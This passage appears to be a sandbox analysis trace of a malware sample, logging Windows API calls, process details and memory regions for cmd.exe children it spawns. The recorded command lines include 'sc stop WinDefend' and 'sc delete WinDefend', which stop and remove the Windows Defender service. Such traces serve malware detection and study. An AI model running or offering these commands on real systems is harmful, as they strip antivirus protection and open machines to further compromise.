(_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0105.923] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0105.923] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0105.923] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0105.923] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0105.923] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0105.923] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0105.924] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0105.924] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0105.924] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0105.924] _wcsnicmp (_String1="COPYCMD", _String2="SESSION", _MaxCount=0x7) returned -16 [0105.924] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0105.924] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0105.924] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0105.924] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0105.924] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0105.924] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0105.924] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0105.924] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0105.924] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0105.924] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0105.924] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1 [0105.925] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc stop WinDefend", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x3df240*(cb=0x48, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="sc stop WinDefend", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3df28c | out: lpCommandLine="sc stop WinDefend", lpProcessInformation=0x3df28c*(hProcess=0x78, hThread=0x74, dwProcessId=0x398, dwThreadId=0x66c)) returned 1 [0106.088] CloseHandle (hObject=0x74) returned 1 [0106.088] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0106.089] GetEnvironmentStringsW () returned 0x854970* [0106.089] FreeEnvironmentStringsW (penv=0x854970) returned 1 [0106.089] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0106.907] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3df180 | out: lpExitCode=0x3df180*=0x5) returned 1 [0106.907] CloseHandle (hObject=0x78) returned 1 [0106.907] _vsnwprintf (in: _Buffer=0x3df2c8, _BufferCount=0x13, _Format="%08X", _ArgList=0x3df18c | out: _Buffer="00000005") returned 8 [0106.907] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000005") returned 1 [0106.907] GetEnvironmentStringsW () returned 0x855fb8* [0106.907] FreeEnvironmentStringsW (penv=0x855fb8) returned 1 [0106.907] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0106.907] GetEnvironmentStringsW () returned 0x855fb8* [0106.907] FreeEnvironmentStringsW (penv=0x855fb8) returned 1 [0106.907] DeleteProcThreadAttributeList (in: lpAttributeList=0x3df1e4 | out: lpAttributeList=0x3df1e4) [0106.907] _get_osfhandle (_FileHandle=1) returned 0x7 [0106.907] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0106.908] _get_osfhandle (_FileHandle=1) returned 0x7 [0106.908] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5741ac | out: lpMode=0x4a5741ac) returned 1 [0106.908] _get_osfhandle (_FileHandle=0) returned 0x3 [0106.908] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5741b0 | out: lpMode=0x4a5741b0) returned 1 [0106.908] SetConsoleInputExeNameW () returned 0x1 [0106.908] GetConsoleOutputCP () returned 0x1b5 [0106.908] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a574260 | out: lpCPInfo=0x4a574260) returned 1 [0106.908] SetThreadUILanguage (LangId=0x0) returned 0x409 [0106.908] exit (_Code=5) Process: id = "7" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x3ba8c000" os_pid = "0x910" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x8bc" cmd_line = "/c sc delete WinDefend" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7e8" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1372 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1373 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1374 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1375 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1376 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1377 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1378 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 1379 start_va = 0x4a550000 end_va = 0x4a59bfff entry_point = 0x4a550000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 1380 start_va = 0x775e0000 end_va = 0x77788fff entry_point = 0x775e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1381 start_va = 0x777c0000 end_va = 0x7793ffff entry_point = 0x777c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1382 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1383 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1384 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1385 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1386 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1387 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1388 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1389 start_va = 0x510000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 1390 start_va = 0x750d0000 end_va = 0x7512bfff entry_point = 0x750d0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1391 start_va = 0x75240000 end_va = 0x7527efff entry_point = 0x75240000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1392 start_va = 0x752b0000 end_va = 0x752b7fff entry_point = 0x752b0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1526 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1527 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1528 start_va = 0x70000 end_va = 0xd6fff entry_point = 0x70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1529 start_va = 0x6c0000 end_va = 0x7bffff entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 1530 start_va = 0x75280000 end_va = 0x75286fff entry_point = 0x75280000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\SysWOW64\\winbrand.dll" (normalized: "c:\\windows\\syswow64\\winbrand.dll") Region: id = 1531 start_va = 0x75310000 end_va = 0x7531bfff entry_point = 0x75310000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1532 start_va = 0x75320000 end_va = 0x7537ffff entry_point = 0x75320000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1533 start_va = 0x75390000 end_va = 0x7542ffff entry_point = 0x75390000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1534 start_va = 0x75510000 end_va = 0x75519fff entry_point = 0x75510000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1535 start_va = 0x755d0000 end_va = 0x7565ffff entry_point = 0x755d0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1536 start_va = 0x758f0000 end_va = 0x759dffff entry_point = 0x758f0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1537 start_va = 0x759f0000 end_va = 0x75a08fff entry_point = 0x759f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1538 start_va = 0x75b60000 end_va = 0x75bfcfff entry_point = 0x75b60000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1539 start_va = 0x75c00000 end_va = 0x75cabfff entry_point = 0x75c00000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1540 start_va = 0x76110000 end_va = 0x76155fff entry_point = 0x76110000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1541 start_va = 0x76380000 end_va = 0x7647ffff entry_point = 0x76380000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1542 start_va = 0x76540000 end_va = 0x7664ffff entry_point = 0x76540000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1543 start_va = 0x773c0000 end_va = 0x774defff entry_point = 0x0 region_type = private name = "private_0x00000000773c0000" filename = "" Region: id = 1544 start_va = 0x774e0000 end_va = 0x775d9fff entry_point = 0x0 region_type = private name = "private_0x00000000774e0000" filename = "" Region: id = 1545 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1546 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1547 start_va = 0x110000 end_va = 0x11ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 1548 start_va = 0x7c0000 end_va = 0x947fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 1549 start_va = 0x75430000 end_va = 0x754fbfff entry_point = 0x75430000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1550 start_va = 0x75cb0000 end_va = 0x75d0ffff entry_point = 0x75cb0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1576 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1577 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1578 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1579 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1580 start_va = 0x950000 end_va = 0xad0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000950000" filename = "" Region: id = 1581 start_va = 0xae0000 end_va = 0x1edffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ae0000" filename = "" Region: id = 1582 start_va = 0x1ee0000 end_va = 0x2222fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ee0000" filename = "" Region: id = 1623 start_va = 0x2230000 end_va = 0x24fefff entry_point = 0x2230000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 109 os_tid = 0x91c [0105.833] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x3df924 | out: lpSystemTimeAsFileTime=0x3df924*(dwLowDateTime=0xe3499550, dwHighDateTime=0x1d4be3a)) [0105.834] GetCurrentProcessId () returned 0x910 [0105.834] GetCurrentThreadId () returned 0x91c [0105.834] GetTickCount () returned 0x27c6f [0105.834] QueryPerformanceCounter (in: lpPerformanceCount=0x3df91c | out: lpPerformanceCount=0x3df91c*=1818320600000) returned 1 [0105.834] GetModuleHandleA (lpModuleName=0x0) returned 0x4a550000 [0105.834] __set_app_type (_Type=0x1) [0105.834] __p__fmode () returned 0x75ca31f4 [0105.836] __p__commode () returned 0x75ca31fc [0105.836] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a5721a6) returned 0x0 [0105.836] __getmainargs (in: _Argc=0x4a574238, _Argv=0x4a574240, _Env=0x4a57423c, _DoWildCard=0, _StartInfo=0x4a574140 | out: _Argc=0x4a574238, _Argv=0x4a574240, _Env=0x4a57423c) returned 0 [0105.836] GetCurrentThreadId () returned 0x91c [0105.836] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x91c) returned 0x60 [0105.836] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76540000 [0105.837] GetProcAddress (hModule=0x76540000, lpProcName="SetThreadUILanguage") returned 0x7656a84f [0105.837] SetThreadUILanguage (LangId=0x0) returned 0x409 [0105.838] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0105.838] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x3df8b4 | out: phkResult=0x3df8b4*=0x0) returned 0x2 [0105.838] VirtualQuery (in: lpAddress=0x3df8eb, lpBuffer=0x3df884, dwLength=0x1c | out: lpBuffer=0x3df884*(BaseAddress=0x3df000, AllocationBase=0x2e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0105.838] VirtualQuery (in: lpAddress=0x2e0000, lpBuffer=0x3df884, dwLength=0x1c | out: lpBuffer=0x3df884*(BaseAddress=0x2e0000, AllocationBase=0x2e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0105.838] VirtualQuery (in: lpAddress=0x2e1000, lpBuffer=0x3df884, dwLength=0x1c | out: lpBuffer=0x3df884*(BaseAddress=0x2e1000, AllocationBase=0x2e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0105.838] VirtualQuery (in: lpAddress=0x2e3000, lpBuffer=0x3df884, dwLength=0x1c | out: lpBuffer=0x3df884*(BaseAddress=0x2e3000, AllocationBase=0x2e0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0105.838] VirtualQuery (in: lpAddress=0x3e0000, lpBuffer=0x3df884, dwLength=0x1c | out: lpBuffer=0x3df884*(BaseAddress=0x3e0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x130000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0105.838] GetConsoleOutputCP () returned 0x1b5 [0105.839] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a574260 | out: lpCPInfo=0x4a574260) returned 1 [0105.839] SetConsoleCtrlHandler (HandlerRoutine=0x4a56e72a, Add=1) returned 1 [0105.839] _get_osfhandle (_FileHandle=1) returned 0x7 [0105.839] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0105.839] _get_osfhandle (_FileHandle=1) returned 0x7 [0105.839] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5741ac | out: lpMode=0x4a5741ac) returned 1 [0105.840] _get_osfhandle (_FileHandle=1) returned 0x7 [0105.840] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0105.840] _get_osfhandle (_FileHandle=0) returned 0x3 [0105.840] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5741b0 | out: lpMode=0x4a5741b0) returned 1 [0105.853] _get_osfhandle (_FileHandle=0) returned 0x3 [0105.853] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0105.854] GetEnvironmentStringsW () returned 0x6d2378* [0105.854] FreeEnvironmentStringsW (penv=0x6d2378) returned 1 [0105.854] GetEnvironmentStringsW () returned 0x6d2378* [0105.855] FreeEnvironmentStringsW (penv=0x6d2378) returned 1 [0105.855] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3de824 | out: phkResult=0x3de824*=0x68) returned 0x0 [0105.855] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3de82c, lpData=0x3de830, lpcbData=0x3de828*=0x1000 | out: lpType=0x3de82c*=0x0, lpData=0x3de830*=0x0, lpcbData=0x3de828*=0x1000) returned 0x2 [0105.855] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3de82c, lpData=0x3de830, lpcbData=0x3de828*=0x1000 | out: lpType=0x3de82c*=0x4, lpData=0x3de830*=0x1, lpcbData=0x3de828*=0x4) returned 0x0 [0105.855] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3de82c, lpData=0x3de830, lpcbData=0x3de828*=0x1000 | out: lpType=0x3de82c*=0x0, lpData=0x3de830*=0x1, lpcbData=0x3de828*=0x1000) returned 0x2 [0105.855] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3de82c, lpData=0x3de830, lpcbData=0x3de828*=0x1000 | out: lpType=0x3de82c*=0x4, lpData=0x3de830*=0x0, lpcbData=0x3de828*=0x4) returned 0x0 [0105.855] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3de82c, lpData=0x3de830, lpcbData=0x3de828*=0x1000 | out: lpType=0x3de82c*=0x4, lpData=0x3de830*=0x40, lpcbData=0x3de828*=0x4) returned 0x0 [0105.855] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3de82c, lpData=0x3de830, lpcbData=0x3de828*=0x1000 | out: lpType=0x3de82c*=0x4, lpData=0x3de830*=0x40, lpcbData=0x3de828*=0x4) returned 0x0 [0105.856] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3de82c, lpData=0x3de830, lpcbData=0x3de828*=0x1000 | out: lpType=0x3de82c*=0x0, lpData=0x3de830*=0x40, lpcbData=0x3de828*=0x1000) returned 0x2 [0105.856] RegCloseKey (hKey=0x68) returned 0x0 [0105.856] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3de824 | out: phkResult=0x3de824*=0x68) returned 0x0 [0105.856] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3de82c, lpData=0x3de830, lpcbData=0x3de828*=0x1000 | out: lpType=0x3de82c*=0x0, lpData=0x3de830*=0x40, lpcbData=0x3de828*=0x1000) returned 0x2 [0105.856] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3de82c, lpData=0x3de830, lpcbData=0x3de828*=0x1000 | out: lpType=0x3de82c*=0x4, lpData=0x3de830*=0x1, lpcbData=0x3de828*=0x4) returned 0x0 [0105.856] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3de82c, lpData=0x3de830, lpcbData=0x3de828*=0x1000 | out: lpType=0x3de82c*=0x0, lpData=0x3de830*=0x1, lpcbData=0x3de828*=0x1000) returned 0x2 [0105.856] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3de82c, lpData=0x3de830, lpcbData=0x3de828*=0x1000 | out: lpType=0x3de82c*=0x4, lpData=0x3de830*=0x0, lpcbData=0x3de828*=0x4) returned 0x0 [0105.856] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3de82c, lpData=0x3de830, lpcbData=0x3de828*=0x1000 | out: lpType=0x3de82c*=0x4, lpData=0x3de830*=0x9, lpcbData=0x3de828*=0x4) returned 0x0 [0105.856] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3de82c, lpData=0x3de830, lpcbData=0x3de828*=0x1000 | out: lpType=0x3de82c*=0x4, lpData=0x3de830*=0x9, lpcbData=0x3de828*=0x4) returned 0x0 [0105.856] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3de82c, lpData=0x3de830, lpcbData=0x3de828*=0x1000 | out: lpType=0x3de82c*=0x0, lpData=0x3de830*=0x9, lpcbData=0x3de828*=0x1000) returned 0x2 [0105.856] RegCloseKey (hKey=0x68) returned 0x0 [0105.856] time (in: timer=0x0 | out: timer=0x0) returned 0x5c5b0e5b [0105.856] srand (_Seed=0x5c5b0e5b) [0105.856] GetCommandLineW () returned="/c sc delete WinDefend" [0105.856] GetCommandLineW () returned="/c sc delete WinDefend" [0105.859] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a575260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0105.859] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x6d4768, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0105.860] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a580640, nSize=0x2000 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0xbf [0105.860] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a580640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0105.860] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a580640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0105.860] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0105.860] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0105.860] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0105.860] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0105.860] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0105.860] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0105.860] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0105.860] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0105.860] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0105.860] GetEnvironmentStringsW () returned 0x6d2378* [0105.860] FreeEnvironmentStringsW (penv=0x6d2378) returned 1 [0105.860] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a580640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0105.860] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a580640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0105.860] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0105.860] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0105.860] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0105.860] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0105.860] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0105.860] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0105.860] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0105.860] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0105.860] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3df5f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0105.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x3df5f0, lpFilePart=0x3df5ec | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x3df5ec*="system32") returned 0x13 [0105.861] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0105.861] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x3df36c | out: lpFindFileData=0x3df36c) returned 0x6c07f0 [0105.861] FindClose (in: hFindFile=0x6c07f0 | out: hFindFile=0x6c07f0) returned 1 [0105.861] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x3df36c | out: lpFindFileData=0x3df36c) returned 0x6c07f0 [0105.861] FindClose (in: hFindFile=0x6c07f0 | out: hFindFile=0x6c07f0) returned 1 [0105.861] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0105.861] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0105.861] SetEnvironmentVariableW (lpName="=C:", 